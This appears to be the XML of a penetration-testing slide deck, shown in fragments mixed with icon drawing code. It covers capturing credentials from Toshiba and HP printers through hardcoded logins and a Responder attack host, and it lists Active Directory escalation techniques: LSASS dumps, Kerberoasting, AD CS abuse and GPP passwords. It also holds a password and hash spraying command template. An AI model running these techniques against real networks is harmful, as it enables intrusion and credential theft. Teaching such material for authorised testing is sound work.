              <a:cs typeface="Poppins SemiBold" pitchFamily="2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54D150-500D-7510-168D-DD79B5A69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9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285"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6651321" y="2159819"/>
            <a:ext cx="5540679" cy="355898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37" y="2043826"/>
            <a:ext cx="5729380" cy="3358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“SAVE AS FILE” in ADMINISTRATION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HARDCODED CREDENTIALS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33" y="2547991"/>
            <a:ext cx="5729378" cy="5477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POINT NETWORK PATH PARAMETER TO ATTACK HOST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8A4A1-3950-B72A-0BC6-BB5716EB8DD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734033" y="3261261"/>
            <a:ext cx="5729377" cy="83507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SET UP RESPONDER ON ATTACK HOST AND EXECUTE CONNECTION TEST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8F849-623B-7402-DDB5-661E67C83CC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734032" y="4261857"/>
            <a:ext cx="5729377" cy="6766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NOTE: TOPACCESS ALLOWS FOR CHANGING OF PROTOCOLS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1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36E14-2588-4A56-FB2B-8ED528CF9B9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5786454" y="246221"/>
            <a:ext cx="5811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TOSHIBA/TOPACCESS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67226-30A1-EB0E-0C7F-0ABC322ECB2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734032" y="5112916"/>
            <a:ext cx="5729377" cy="6766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FTP PROTOCOL AUTHENTICATES IN PLAINTEXT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r="977"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6651321" y="2159819"/>
            <a:ext cx="5540679" cy="355898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34037" y="2194138"/>
            <a:ext cx="5729380" cy="3358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SCAN TAB - MULTIPLE OPTIONS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0" y="0"/>
            <a:ext cx="5065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HARDCODED CREDENTIALS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DC9EF-62F8-5597-BB6B-C3CBF966E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CE2051-7CAB-CA08-14CA-22E6EA8BEB4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734033" y="4138793"/>
            <a:ext cx="5729378" cy="54775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POINT NETWORK PATH PARAMETER TO ATTACK HOST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8A4A1-3950-B72A-0BC6-BB5716EB8DD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734033" y="4852063"/>
            <a:ext cx="5729377" cy="83507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SET UP RESPONDER ON ATTACK HOST, SAVE AND TEST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88F849-623B-7402-DDB5-661E67C83CC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734033" y="2695485"/>
            <a:ext cx="5729377" cy="835078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  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PAY ATTENTION TO NETWORK FOLDERS AND OUTGOING EMAIL ACCOUNTS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36E14-2588-4A56-FB2B-8ED528CF9B9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7126842" y="246221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HP/VIRATA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="965274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using a laptop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8538"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6493814" y="1027348"/>
            <a:ext cx="5691188" cy="4579937"/>
          </a:xfrm>
          <a:effectLst>
            <a:softEdge rad="647098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27520" y="1286497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EXPLOIT CURRENT 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27520" y="1746084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DOMAIN / LOCAL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27520" y="2682234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SPRAY FOR LOCAL ADMIN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3B344-A808-E601-04B2-61C051D7DFF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727520" y="2228920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EXPAND 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1540962" y="277127"/>
            <a:ext cx="2162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STEP 2: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CDE4B-82FB-C5CC-19E4-2ED79A9C8142}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="277126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EXPAND FOOTPRINT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5FE0A3-B408-9729-E24F-0B26D6624E64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727520" y="3148074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LSA DUMPS FOR DOMAIN USERS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832F2B-2FE2-5134-235B-FDAC822B4D37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727520" y="3601388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BLOODHOUND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04A292-690F-74FE-1A98-C9562676BB83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727520" y="4079754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AD CS ABUSE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01EB22-DE52-A0A1-91BC-713687F72ED7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727520" y="4545359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GPP PASSWORDS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2FD661-9694-8D90-3A23-EF7510801F2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727520" y="5007078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KERBEROASTING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5AAF7-71DE-3755-69E1-2C1B11873B1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727520" y="5481323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LSASS DUMPS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CE2707-4E98-AB65-3244-D3D787522FEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727520" y="5941199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303843-B13B-76D0-9AB4-77CF669A4424}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727520" y="6387716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SHARED DRIVE MINING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2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220767"/>
            <a:ext cx="645159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LOCAL ADMIN HASHES AND PASSWORDS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8718" y="1877125"/>
            <a:ext cx="6435350" cy="598797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&lt;445 HOSTS&gt; -u &lt;USERNAME&gt; -H or -p &lt;PASSWORD OR HASH&gt; --local-auth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223986" y="277127"/>
            <a:ext cx="690285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SPRAY FOR LOCAL ADMIN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CD2C6-5D22-DDCB-CD6C-EE5C51B2C7EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="2568131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SAVE RAW OUTPUT TO FILE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CA7CC-8D8F-EBD5-2B66-A6F49E89F38E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="3045060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GREP FOR </a:t>
            </a:r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’Pwn3d’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411B8C-1C5F-9316-A81A-C37A0A877694}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="3536707"/>
            <a:ext cx="6451592" cy="5968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HASHES AND PASSWORDS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D1BF36-9C37-4372-0A3B-A4245BE1258C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="4182475"/>
            <a:ext cx="6435350" cy="598797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&lt;445 HOSTS&gt; -u &lt;USERNAME&gt; -H or -p &lt;PASSWORD OR HASH&gt;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29A3A7-7F05-D163-4D52-9C1280424605}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="4873481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SAVE RAW OUTPUT TO FILE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FB0339-A6F1-A169-7454-4ADFFCAE8331}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="5350410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GREP FOR </a:t>
            </a:r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’Pwn3d’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EF1B4-48E2-1457-A64E-059CE7435A1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5398718" y="5998092"/>
            <a:ext cx="6451592" cy="5968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REPEAT WITH EACH NEW LOCAL ADMIN/DOMAIN USER ACCOUNT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Placeholder 5" descr="Cough outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{437C05D1-D1C8-6CDF-5130-3324424C8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1" b="1831"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1331832"/>
            <a:ext cx="4922728" cy="4742460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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3634991-964B-FEBF-3E43-2C362C353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77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Picture Placeholder 5" descr="Hot dog outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3486DADE-64B6-3327-7A29-4B07B9719141}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="761730" y="1681055"/>
            <a:ext cx="3512002" cy="3645904"/>
            <a:chOff x="504947" y="2113871"/>
            <a:chExt cx="3512002" cy="3645904"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx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2113772-8456-FAE5-F122-FAFA452E75CC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1180942" y="2784493"/>
              <a:ext cx="2204829" cy="2136345"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 2171667 w 2204829"/>
                <a:gd name="connsiteY0" fmla="*/ 3193 h 2136345"/>
                <a:gd name="connsiteX1" fmla="*/ 2162246 w 2204829"/>
                <a:gd name="connsiteY1" fmla="*/ 1073 h 2136345"/>
                <a:gd name="connsiteX2" fmla="*/ 2112223 w 2204829"/>
                <a:gd name="connsiteY2" fmla="*/ 30136 h 2136345"/>
                <a:gd name="connsiteX3" fmla="*/ 2042746 w 2204829"/>
                <a:gd name="connsiteY3" fmla="*/ 144031 h 2136345"/>
                <a:gd name="connsiteX4" fmla="*/ 1890556 w 2204829"/>
                <a:gd name="connsiteY4" fmla="*/ 223070 h 2136345"/>
                <a:gd name="connsiteX5" fmla="*/ 1588719 w 2204829"/>
                <a:gd name="connsiteY5" fmla="*/ 525048 h 2136345"/>
                <a:gd name="connsiteX6" fmla="*/ 1357914 w 2204829"/>
                <a:gd name="connsiteY6" fmla="*/ 756089 h 2136345"/>
                <a:gd name="connsiteX7" fmla="*/ 1056077 w 2204829"/>
                <a:gd name="connsiteY7" fmla="*/ 1057878 h 2136345"/>
                <a:gd name="connsiteX8" fmla="*/ 825037 w 2204829"/>
                <a:gd name="connsiteY8" fmla="*/ 1288966 h 2136345"/>
                <a:gd name="connsiteX9" fmla="*/ 523341 w 2204829"/>
                <a:gd name="connsiteY9" fmla="*/ 1590662 h 2136345"/>
                <a:gd name="connsiteX10" fmla="*/ 292536 w 2204829"/>
                <a:gd name="connsiteY10" fmla="*/ 1821702 h 2136345"/>
                <a:gd name="connsiteX11" fmla="*/ 94939 w 2204829"/>
                <a:gd name="connsiteY11" fmla="*/ 1925847 h 2136345"/>
                <a:gd name="connsiteX12" fmla="*/ 1675 w 2204829"/>
                <a:gd name="connsiteY12" fmla="*/ 2080016 h 2136345"/>
                <a:gd name="connsiteX13" fmla="*/ 30643 w 2204829"/>
                <a:gd name="connsiteY13" fmla="*/ 2132503 h 2136345"/>
                <a:gd name="connsiteX14" fmla="*/ 32951 w 2204829"/>
                <a:gd name="connsiteY14" fmla="*/ 2133101 h 2136345"/>
                <a:gd name="connsiteX15" fmla="*/ 42372 w 2204829"/>
                <a:gd name="connsiteY15" fmla="*/ 2135220 h 2136345"/>
                <a:gd name="connsiteX16" fmla="*/ 92395 w 2204829"/>
                <a:gd name="connsiteY16" fmla="*/ 2106158 h 2136345"/>
                <a:gd name="connsiteX17" fmla="*/ 161731 w 2204829"/>
                <a:gd name="connsiteY17" fmla="*/ 1992451 h 2136345"/>
                <a:gd name="connsiteX18" fmla="*/ 313874 w 2204829"/>
                <a:gd name="connsiteY18" fmla="*/ 1913506 h 2136345"/>
                <a:gd name="connsiteX19" fmla="*/ 615334 w 2204829"/>
                <a:gd name="connsiteY19" fmla="*/ 1611811 h 2136345"/>
                <a:gd name="connsiteX20" fmla="*/ 846139 w 2204829"/>
                <a:gd name="connsiteY20" fmla="*/ 1381006 h 2136345"/>
                <a:gd name="connsiteX21" fmla="*/ 1147881 w 2204829"/>
                <a:gd name="connsiteY21" fmla="*/ 1079310 h 2136345"/>
                <a:gd name="connsiteX22" fmla="*/ 1379016 w 2204829"/>
                <a:gd name="connsiteY22" fmla="*/ 848128 h 2136345"/>
                <a:gd name="connsiteX23" fmla="*/ 1680806 w 2204829"/>
                <a:gd name="connsiteY23" fmla="*/ 546339 h 2136345"/>
                <a:gd name="connsiteX24" fmla="*/ 1912082 w 2204829"/>
                <a:gd name="connsiteY24" fmla="*/ 315109 h 2136345"/>
                <a:gd name="connsiteX25" fmla="*/ 2109679 w 2204829"/>
                <a:gd name="connsiteY25" fmla="*/ 210870 h 2136345"/>
                <a:gd name="connsiteX26" fmla="*/ 2203085 w 2204829"/>
                <a:gd name="connsiteY26" fmla="*/ 56561 h 2136345"/>
                <a:gd name="connsiteX27" fmla="*/ 2174418 w 2204829"/>
                <a:gd name="connsiteY27" fmla="*/ 3904 h 2136345"/>
                <a:gd name="connsiteX28" fmla="*/ 2171667 w 2204829"/>
                <a:gd name="connsiteY28" fmla="*/ 3193 h 21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04829" h="2136345">
                  <a:moveTo>
                    <a:pt x="2171667" y="3193"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2162246" y="1073"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2140527" y="-3892"/>
                    <a:pt x="2118666" y="8807"/>
                    <a:pt x="2112223" y="30136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2099882" y="73725"/>
                    <a:pt x="2075854" y="113113"/>
                    <a:pt x="2042746" y="144031"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2002143" y="186471"/>
                    <a:pt x="1948625" y="214266"/>
                    <a:pt x="1890556" y="223070"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1737277" y="251817"/>
                    <a:pt x="1617395" y="371756"/>
                    <a:pt x="1588719" y="525048"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1568126" y="642985"/>
                    <a:pt x="1475832" y="735373"/>
                    <a:pt x="1357914" y="756089"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1204683" y="784798"/>
                    <a:pt x="1084810" y="904652"/>
                    <a:pt x="1056077" y="1057878"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1035536" y="1175938"/>
                    <a:pt x="943091" y="1268401"/>
                    <a:pt x="825037" y="1288966"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="671839" y="1317619"/>
                    <a:pt x="551994" y="1437463"/>
                    <a:pt x="523341" y="1590662"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="502838" y="1708645"/>
                    <a:pt x="410501" y="1801076"/>
                    <a:pt x="292536" y="1821702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217204" y="1834317"/>
                    <a:pt x="147925" y="1870831"/>
                    <a:pt x="94939" y="1925847"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50554" y="1967915"/>
                    <a:pt x="18335" y="2021175"/>
                    <a:pt x="1675" y="2080016"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-4821" y="2102508"/>
                    <a:pt x="8151" y="2126012"/>
                    <a:pt x="30643" y="2132503"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31406" y="2132724"/>
                    <a:pt x="32179" y="2132922"/>
                    <a:pt x="32951" y="2133101"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42372" y="2135220"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64115" y="2140331"/>
                    <a:pt x="86069" y="2127581"/>
                    <a:pt x="92395" y="2106158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104703" y="2062640"/>
                    <a:pt x="128679" y="2023318"/>
                    <a:pt x="161731" y="1992451"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202320" y="1950035"/>
                    <a:pt x="255824" y="1922272"/>
                    <a:pt x="313874" y="1913506"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="466973" y="1884754"/>
                    <a:pt x="586705" y="1764934"/>
                    <a:pt x="615334" y="1611811"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="635956" y="1493931"/>
                    <a:pt x="728259" y="1401627"/>
                    <a:pt x="846139" y="1381006"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="999356" y="1352372"/>
                    <a:pt x="1119224" y="1232523"/>
                    <a:pt x="1147881" y="1079310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1168451" y="961213"/>
                    <a:pt x="1260924" y="868722"/>
                    <a:pt x="1379016" y="848128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1532247" y="819438"/>
                    <a:pt x="1652115" y="699570"/>
                    <a:pt x="1680806" y="546339"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1701441" y="428214"/>
                    <a:pt x="1793952" y="335722"/>
                    <a:pt x="1912082" y="315109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1987418" y="302439"/>
                    <a:pt x="2056688" y="265896"/>
                    <a:pt x="2109679" y="210870"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2154131" y="168774"/>
                    <a:pt x="2186396" y="115463"/>
                    <a:pt x="2203085" y="56561"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2209712" y="34106"/>
                    <a:pt x="2196876" y="10531"/>
                    <a:pt x="2174418" y="3904"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2173509" y="3635"/>
                    <a:pt x="2172590" y="3400"/>
                    <a:pt x="2171667" y="3193"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:ln w="47030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525D4D3-1F0E-79EC-9DD0-E5CE94E417F0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="504947" y="2113871"/>
              <a:ext cx="3512002" cy="3512391"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 3388028 w 3512002"/>
                <a:gd name="connsiteY0" fmla="*/ 856904 h 3512391"/>
                <a:gd name="connsiteX1" fmla="*/ 3279220 w 3512002"/>
                <a:gd name="connsiteY1" fmla="*/ 748095 h 3512391"/>
                <a:gd name="connsiteX2" fmla="*/ 3253879 w 3512002"/>
                <a:gd name="connsiteY2" fmla="*/ 258317 h 3512391"/>
                <a:gd name="connsiteX3" fmla="*/ 2766173 w 3512002"/>
                <a:gd name="connsiteY3" fmla="*/ 235095 h 3512391"/>
                <a:gd name="connsiteX4" fmla="*/ 2655293 w 3512002"/>
                <a:gd name="connsiteY4" fmla="*/ 124168 h 3512391"/>
                <a:gd name="connsiteX5" fmla="*/ 2055769 w 3512002"/>
                <a:gd name="connsiteY5" fmla="*/ 124163 h 3512391"/>
                <a:gd name="connsiteX6" fmla="*/ 2055764 w 3512002"/>
                <a:gd name="connsiteY6" fmla="*/ 124168 h 3512391"/>
                <a:gd name="connsiteX7" fmla="*/ 123973 w 3512002"/>
                <a:gd name="connsiteY7" fmla="*/ 2055960 h 3512391"/>
                <a:gd name="connsiteX8" fmla="*/ 123973 w 3512002"/>
                <a:gd name="connsiteY8" fmla="*/ 2655489 h 3512391"/>
                <a:gd name="connsiteX9" fmla="*/ 234900 w 3512002"/>
                <a:gd name="connsiteY9" fmla="*/ 2766369 h 3512391"/>
                <a:gd name="connsiteX10" fmla="*/ 258122 w 3512002"/>
                <a:gd name="connsiteY10" fmla="*/ 3254075 h 3512391"/>
                <a:gd name="connsiteX11" fmla="*/ 747429 w 3512002"/>
                <a:gd name="connsiteY11" fmla="*/ 3278945 h 3512391"/>
                <a:gd name="connsiteX12" fmla="*/ 856708 w 3512002"/>
                <a:gd name="connsiteY12" fmla="*/ 3388225 h 3512391"/>
                <a:gd name="connsiteX13" fmla="*/ 1456232 w 3512002"/>
                <a:gd name="connsiteY13" fmla="*/ 3388229 h 3512391"/>
                <a:gd name="connsiteX14" fmla="*/ 1456236 w 3512002"/>
                <a:gd name="connsiteY14" fmla="*/ 3388225 h 3512391"/>
                <a:gd name="connsiteX15" fmla="*/ 3388028 w 3512002"/>
                <a:gd name="connsiteY15" fmla="*/ 1456432 h 3512391"/>
                <a:gd name="connsiteX16" fmla="*/ 3388028 w 3512002"/>
                <a:gd name="connsiteY16" fmla="*/ 856904 h 3512391"/>
                <a:gd name="connsiteX17" fmla="*/ 190576 w 3512002"/>
                <a:gd name="connsiteY17" fmla="*/ 2122564 h 3512391"/>
                <a:gd name="connsiteX18" fmla="*/ 2122368 w 3512002"/>
                <a:gd name="connsiteY18" fmla="*/ 190771 h 3512391"/>
                <a:gd name="connsiteX19" fmla="*/ 2588665 w 3512002"/>
                <a:gd name="connsiteY19" fmla="*/ 190748 h 3512391"/>
                <a:gd name="connsiteX20" fmla="*/ 2588689 w 3512002"/>
                <a:gd name="connsiteY20" fmla="*/ 190771 h 3512391"/>
                <a:gd name="connsiteX21" fmla="*/ 2698345 w 3512002"/>
                <a:gd name="connsiteY21" fmla="*/ 300427 h 3512391"/>
                <a:gd name="connsiteX22" fmla="*/ 300232 w 3512002"/>
                <a:gd name="connsiteY22" fmla="*/ 2698541 h 3512391"/>
                <a:gd name="connsiteX23" fmla="*/ 190576 w 3512002"/>
                <a:gd name="connsiteY23" fmla="*/ 2588885 h 3512391"/>
                <a:gd name="connsiteX24" fmla="*/ 190576 w 3512002"/>
                <a:gd name="connsiteY24" fmla="*/ 2122564 h 3512391"/>
                <a:gd name="connsiteX25" fmla="*/ 517189 w 3512002"/>
                <a:gd name="connsiteY25" fmla="*/ 3268206 h 3512391"/>
                <a:gd name="connsiteX26" fmla="*/ 324726 w 3512002"/>
                <a:gd name="connsiteY26" fmla="*/ 3187471 h 3512391"/>
                <a:gd name="connsiteX27" fmla="*/ 324726 w 3512002"/>
                <a:gd name="connsiteY27" fmla="*/ 2807255 h 3512391"/>
                <a:gd name="connsiteX28" fmla="*/ 2807059 w 3512002"/>
                <a:gd name="connsiteY28" fmla="*/ 324921 h 3512391"/>
                <a:gd name="connsiteX29" fmla="*/ 3187275 w 3512002"/>
                <a:gd name="connsiteY29" fmla="*/ 324921 h 3512391"/>
                <a:gd name="connsiteX30" fmla="*/ 3191985 w 3512002"/>
                <a:gd name="connsiteY30" fmla="*/ 705137 h 3512391"/>
                <a:gd name="connsiteX31" fmla="*/ 710783 w 3512002"/>
                <a:gd name="connsiteY31" fmla="*/ 3186340 h 3512391"/>
                <a:gd name="connsiteX32" fmla="*/ 517189 w 3512002"/>
                <a:gd name="connsiteY32" fmla="*/ 3268206 h 3512391"/>
                <a:gd name="connsiteX33" fmla="*/ 3321424 w 3512002"/>
                <a:gd name="connsiteY33" fmla="*/ 1389828 h 3512391"/>
                <a:gd name="connsiteX34" fmla="*/ 1389633 w 3512002"/>
                <a:gd name="connsiteY34" fmla="*/ 3321621 h 3512391"/>
                <a:gd name="connsiteX35" fmla="*/ 923336 w 3512002"/>
                <a:gd name="connsiteY35" fmla="*/ 3321644 h 3512391"/>
                <a:gd name="connsiteX36" fmla="*/ 923312 w 3512002"/>
                <a:gd name="connsiteY36" fmla="*/ 3321621 h 3512391"/>
                <a:gd name="connsiteX37" fmla="*/ 816011 w 3512002"/>
                <a:gd name="connsiteY37" fmla="*/ 3214320 h 3512391"/>
                <a:gd name="connsiteX38" fmla="*/ 3214124 w 3512002"/>
                <a:gd name="connsiteY38" fmla="*/ 816207 h 3512391"/>
                <a:gd name="connsiteX39" fmla="*/ 3321424 w 3512002"/>
                <a:gd name="connsiteY39" fmla="*/ 923507 h 3512391"/>
                <a:gd name="connsiteX40" fmla="*/ 3321424 w 3512002"/>
                <a:gd name="connsiteY40" fmla="*/ 1389828 h 351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12002" h="3512391">
                  <a:moveTo>
                    <a:pt x="3388028" y="856904"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3279220" y="748095"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3396441" y="602109"/>
                    <a:pt x="3385536" y="391426"/>
                    <a:pt x="3253879" y="258317"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3121411" y="126447"/>
                    <a:pt x="2910572" y="116405"/>
                    <a:pt x="2766173" y="235095"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2655293" y="124168"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2489739" y="-41387"/>
                    <a:pt x="2221322" y="-41389"/>
                    <a:pt x="2055769" y="124163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2055769" y="124163"/>
                    <a:pt x="2055764" y="124168"/>
                    <a:pt x="2055764" y="124168"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="123973" y="2055960"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-41324" y="2221622"/>
                    <a:pt x="-41324" y="2489827"/>
                    <a:pt x="123973" y="2655489"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="234900" y="2766369"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="116257" y="2910783"/>
                    <a:pt x="126295" y="3121588"/>
                    <a:pt x="258122" y="3254075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="389936" y="3388361"/>
                    <a:pt x="602681" y="3399176"/>
                    <a:pt x="747429" y="3278945"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="856708" y="3388225"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1022261" y="3553778"/>
                    <a:pt x="1290679" y="3553783"/>
                    <a:pt x="1456232" y="3388229"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1456232" y="3388229"/>
                    <a:pt x="1456236" y="3388225"/>
                    <a:pt x="1456236" y="3388225"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3388028" y="1456432"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3553327" y="1290770"/>
